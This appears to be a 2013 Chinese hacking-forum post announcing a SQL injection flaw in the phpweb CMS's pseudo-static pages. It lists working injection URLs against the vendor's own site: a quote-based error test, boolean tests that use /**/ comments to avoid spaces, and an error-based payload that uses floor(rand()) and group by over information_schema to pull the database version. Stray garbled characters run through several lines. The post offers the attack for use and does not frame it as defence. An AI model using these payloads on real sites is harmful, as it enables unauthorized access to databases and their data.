找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2158|回复: 0
打印 上一主题 下一主题

phpweb伪静态页面注入0day

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-4 19:46:42 | 只看该作者 回帖奖励 |正序浏览 |阅读模式
phpweb所有的整站程序伪静态页面都存在sql注入# E# y9 r' r/ J& B2 P$ v/ E1 T# i
' g' N: n9 Q, X% R+ h2 U
主站:http://phpweb.net/
4 t0 q3 a0 g7 l加’检测:7 o2 {. p# Q" t

/ }! I- ?! r* b; ihttp://www.phpweb.net/down/html/?772′.html. @) F7 J- u! P  K% I/ ?( ?
6 W2 g. ?$ |4 J
出错1 E& z% p- _( e+ J
存在注入。
) i1 `& ]" Q+ d. }  X6 S不能用空格,只能用/*罗
9 a. D% v; l+ o0 {* \http://www.phpweb.net/page/html/?56′/**/and/**/1=1/*.html 正常8 Q1 o5 [5 s  T1 {: ?

- ]: `% N# _9 z5 e$ w: m9 zhttp://www.phpweb.net/page/html/?56′/**/and/**/1=2/*.html 出错.
' w8 E! u( R3 E0 y, v/ v爆数据库版本:. n5 `7 w+ g! D' e0 h
5 I5 }$ ?7 ?# n  z
?0 v4 p! C% J% ?* N' O
1
' ]8 P8 ~9 ~  V* D0 X3 chttp://www.phpweb.net/page/html/?56'/**/and/**/(SELECT/**/1/**/from/**/(select/**/count(*),concat(floor(rand(0)*2),(substring((select(version())),1,62)))a/**/from/**/information_schema.tables/**/group/**/by/**/a)b)=1/*.html& z" Q3 J8 q2 L- r  n
更新日期: 2013-01-03 13:39:50        
' s2 D3 c4 F9 m& E
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表